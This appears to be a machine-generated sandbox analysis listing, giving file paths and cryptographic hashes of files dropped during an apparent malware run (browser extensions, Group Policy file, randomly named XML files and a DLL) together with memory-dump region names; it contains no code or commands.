C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d155a78ca3dbb3a00a2b84767ccdd13d
SHA1 3a24163e7f933fdbc70b14c570e5286dc5ea038e
SHA256 f94ffffea37b4eacfb334e04fbe359c19198346ae3505e402b963f8acbf3a790
SHA512 91b561795b1c08af7de62e3d06ab58f2f89d901d167e0c5a12d799a2e8a4f0b86a58250ec36caf152ba51270c9453e07b1805db9a6597cc6dcd8c776efcdafe5

memory/4164-79-0x0000000072E20000-0x00000000735D1000-memory.dmp

memory/3292-90-0x000002567AC70000-0x000002567AC80000-memory.dmp

memory/3292-91-0x000002567AC70000-0x000002567AC80000-memory.dmp

memory/3292-89-0x000002567ADA0000-0x000002567ADC2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f6d2fe13a0be276e735ab427bccb8b5c
SHA1 083e760962aa083903cf938b2804a0ed36547bcf
SHA256 0f624158e4d69ed8e2cde71b45669c1c80725594d2ba0284555086a655fea236
SHA512 59cc899c45d5374486ba176a950624841be96799f83a6006ed6c9faef47d41bc54db1cc17f723f9e626383d3d60a4a682f076bc1077cabeaf9a25e8f2c7adda6

memory/3292-88-0x00007FFC60180000-0x00007FFC60C42000-memory.dmp

memory/3292-97-0x00007FFC60180000-0x00007FFC60C42000-memory.dmp

memory/1204-98-0x0000000000E60000-0x000000000151A000-memory.dmp

memory/4600-103-0x00000000004D0000-0x0000000000B8A000-memory.dmp

memory/1204-105-0x0000000000E60000-0x000000000151A000-memory.dmp

memory/4600-104-0x0000000010000000-0x0000000014B4C000-memory.dmp

memory/4600-116-0x0000000002600000-0x0000000002685000-memory.dmp

memory/3608-120-0x0000000001420000-0x0000000001430000-memory.dmp

memory/3608-117-0x0000000072D30000-0x00000000734E1000-memory.dmp

memory/3608-122-0x0000000001420000-0x0000000001430000-memory.dmp

memory/3608-131-0x00000000047B0000-0x0000000004B07000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 99ef28dc80a273f4cd4339791ac82cbe
SHA1 a16291612bb45ef85df0f5e30a7d634994e42c3a
SHA256 e1fc9f5e320e537df35b605fabb89fd7da99433f1b72999a1d4d8205a0a287b1
SHA512 5697b10555c95482f7bc1c1f906688aed56d1dff01256f31b55b52062ac89bdfd13e3a8850af4ad37e3dc0b6efb39c1d077553a90d60e4f85dde1ac2595f5df9

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 e7f61528160715bbe7e19895b32c9205
SHA1 bc213e90ecef28e4187b8adf814492e0724074fe
SHA256 524df25177fbe513322540e08e2afa2688935163ba509dd69c5d0496321eacca
SHA512 3ed20b1c1f79627be6176a1c78ab57e6a68efb61fd3d035547633e3d1fe4b38a44bf0a45aa141f6da6eb3ce4dbcc601ea8f86408b7f3f1433602b8318cc4789a

memory/3608-162-0x0000000004E30000-0x0000000004E7C000-memory.dmp

memory/3608-166-0x0000000072D30000-0x00000000734E1000-memory.dmp

memory/4600-176-0x0000000003090000-0x00000000030F9000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 076dee9a0e7f704f50435a860ef61ffc
SHA1 71bfb3f8905b3c81698ce82e5fe37097dd9b9d7c
SHA256 153089f4c44b875138ca8d7bbfe3fc6817173c18afa9c44391aad496957c29de
SHA512 f494671a802d512087f3c814f581e986f884d83605f642fbf9493d3ca39ce3005436bd25990085dd4e2e2b3a506765f3ef453f8e4a50b686c4cea14b9208ccc6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

MD5 bd6b60b18aee6aaeb83b35c68fb48d88
SHA1 9b977a5fbf606d1104894e025e51ac28b56137c3
SHA256 b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA512 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

C:\Program Files (x86)\qBvbbKpBU\DEqklWO.xml

MD5 765e2024faa60bc54d9903f7b64b7bfd
SHA1 22f0a25172b37e69a197abbcae0464d1614dd3ec
SHA256 05d12e0a126734b2d44eef3299083b2e3a7b8fa8649eb2d51b45a4cf3e938a70
SHA512 695c5914c741f7d5cd2c6f76b1ee4612175d047e4d7e99852b9d72fc11cadaa1cb1fc2568f1141c68d741f62d93a8a7825d1dde5b0255cd9741eed083c390537

C:\Program Files (x86)\fZHZowTYSgfU2\BaSMZgS.xml

MD5 eb17923a53eed35df36672f2c1844555
SHA1 fd8debccae2e7745692efb2de96b14f0f899cd24
SHA256 a2fbdb788efc05309395f74c9e11b7daf65dd88047f62d81640e73670f2b8388
SHA512 b047efa1c5a379a0f74a18b00d6f7d20cca3bb1e1af82e0c01fdac3f2bbb61791dd5882704f11844a8ca913bba8520f3d59364053aaa4b9a946b7952cc2f7506

C:\ProgramData\nxeoDZreGracWIVB\axofhyl.xml

MD5 6924335079ad40d54c79a1a13d2cffa9
SHA1 050ef2009bcb011347df11e9ec082e91e8d4d8bf
SHA256 8983c85a690312d93aebd7c343f7d36e6a9c338c98ce046fe6bef3ef4ebe5465
SHA512 512913e02bd69e132b259dc1f8e25aa86e18f5bd42d9a7995ef956bf0d9a76c50ed79371f98a5c2fb8f68da4f9a94821f5abc90e2f6977020904b2dd81b7fe68

C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\XvHXZAA.xml

MD5 61b110d7a87941f20c659ab2fff5c9aa
SHA1 e20ee694720ac88d8fbbf3e0fd038b7d5f83e3fb
SHA256 c458181272e14db89829392a54e0834b3d180110894a9f93a6ab9acf9ef081a7
SHA512 6f0524a21263f46bf6f2c393ef138f5b3ea3427d28e34e21ab42fb193e4d391fc1f41c5a54d421be501f435e51dfdc59b8701551af29bf8e550d3c799ac6b69d

C:\Program Files (x86)\epUZFeichsCPC\GlGomVo.xml

MD5 a3b7f0642197e765896aa0d42966f2f6
SHA1 68660667165bb98d2e920919c74fbbd2c67badfe
SHA256 5722ed2910727cacee46108f3ab822fc0010de0f0a219762827f873427921129
SHA512 d9a281ce0c81dd567da7962605cdb8c67fe5f5f7781b38ec8f8aa79895c6880b63ed181e6b6348798cdbf7a4b9768ed88d550c0cb2335604035617b2c63ec4ed

C:\Windows\Temp\JHEwijpMlSQrgvQB\iwylrPXt\QdcQzQC.dll

MD5 44f3948cb32c3b8df1fca5ef30116aa0
SHA1 c674b72e1e1058d0e29d555abc09d40f0c7c8a0c
SHA256 12cd48a7e59081b04ad77863bdfc946ecaeccede9368f6410e05c80ee526a0fe
SHA512 09d5de6251c88e853132bc8455f2da4d4922a9059778c5103652da3420cd7f98de983f6e3e9ebbe201bd520ac6dbff4cc95b7f01cf6ea335b05671f99649b5b0

memory/4600-506-0x0000000003870000-0x00000000038FA000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4lkuyr4n.default-release\prefs.js

MD5 da2bbeb9f87d607f66095128a9dac4a1
SHA1 7a8624f8dfeb3471c2054c9fab490811fe2f80e8
SHA256 0f78a519bdfb3728556b4ab158699ab9ab931a98c38add232a97fef4dfee454e
SHA512 a4613eb7de12aec8ccf9034aaa6efd52bea234b2e82dd8c401deb3383d22079b7f57a0546ed0641c40824fef923dbbb7e9c8c01483bd6bfb201c9a200f3a10ca

memory/4600-522-0x0000000003AC0000-0x0000000003BA2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 2585369d1d195ddce33662fe9b117a77
SHA1 75c5d58b00fc070d799e0db347427469f51bd1ca
SHA256 8194c0b313fe0958ad8d6dc665ccc544563bde15383b33d12ebafc76dbd5ca1e
SHA512 4af1bfe6b4515950228031a08f9752bbbbd2d4b299ae1fa86b1f8fc6997f41da549cfc5bedb641743653251f7ccc2b751aff08c9ec7677d7d7b599d86c041e1f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 1c843d2b6fb42c1f78dcc879c4a88d1c
SHA1 361c1b427924c75419b5b376db1f30bd9f90e4e1
SHA256 b5545875de3c9a044ae28a05088cf2b0b169731cacb157c0afcb74b14ad64990
SHA512 fcadcba87b2acf5be137ced5407ebd00ec97bd7620f2a38aef30e62593fd073d0fe40a8e985d1e0d9c69150b1df4d54844b05d1e3f9bb2c06eaf8a59c4be885e

memory/1868-521-0x0000000002CD0000-0x000000000781C000-memory.dmp

memory/3160-580-0x00000000008A0000-0x0000000000F5A000-memory.dmp

memory/4600-593-0x00000000004D0000-0x0000000000B8A000-memory.dmp